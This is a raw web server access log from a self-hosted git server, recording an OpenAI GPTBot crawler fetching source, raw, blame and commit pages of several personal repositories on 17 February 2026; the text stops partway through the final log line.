"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" +[17/Feb/2026:15:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" +[17/Feb/2026:15:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13885] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" +[17/Feb/2026:15:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" +[17/Feb/2026:15:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15554] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" +[17/Feb/2026:15:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14206] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" +[17/Feb/2026:15:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14663] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" +[17/Feb/2026:15:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16480] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" +[17/Feb/2026:15:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" +[17/Feb/2026:15:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11860] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" +[17/Feb/2026:15:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 13137] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" +[17/Feb/2026:15:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 13107] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" +[17/Feb/2026:15:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py?display=source" [Client 74.7.227.38] [Length 12963] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" +[17/Feb/2026:15:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" +[17/Feb/2026:15:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/update_status.py" +[17/Feb/2026:15:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" +[17/Feb/2026:15:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12597] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" +[17/Feb/2026:15:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py?display=source" [Client 74.7.227.38] [Length 15653] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/mail_contact.py" +[17/Feb/2026:15:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12473] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/docker-compose.yml" +[17/Feb/2026:15:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" +[17/Feb/2026:15:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14236] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:15:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:15:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:15:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 1858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:15:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 1858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:15:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12760] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" +[17/Feb/2026:15:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 31618] [Gzip 13.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:15:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 13898] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:15:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 21394] [Gzip 10.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:15:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 15000] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:15:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 10898] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:15:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj" [Client 74.7.227.38] [Length 32381] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" +[17/Feb/2026:15:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11757] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" +[17/Feb/2026:15:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostcomplete&state=all" [Client 74.7.227.38] [Length 8492] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=mostcomplete&state=open" +[17/Feb/2026:15:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js/script.js" [Client 74.7.227.38] [Length 10865] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" +[17/Feb/2026:15:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 11979] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:15:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16543] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" +[17/Feb/2026:15:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 39650] [Gzip 25.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:15:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 9923] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:15:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 9918] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:15:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 14062] [Gzip 8.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:15:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 5643848] [Gzip 11.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:15:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:15:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-next-todo.md" +[17/Feb/2026:15:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 15310] [Gzip 9.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:15:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 9919] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:15:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 9917] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:15:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 1822591] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:15:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" [Client 74.7.227.38] [Length 6319] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" +[17/Feb/2026:15:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 24860] [Gzip 20.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:15:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 48601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:15:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 23750] [Gzip -] [Sent-to 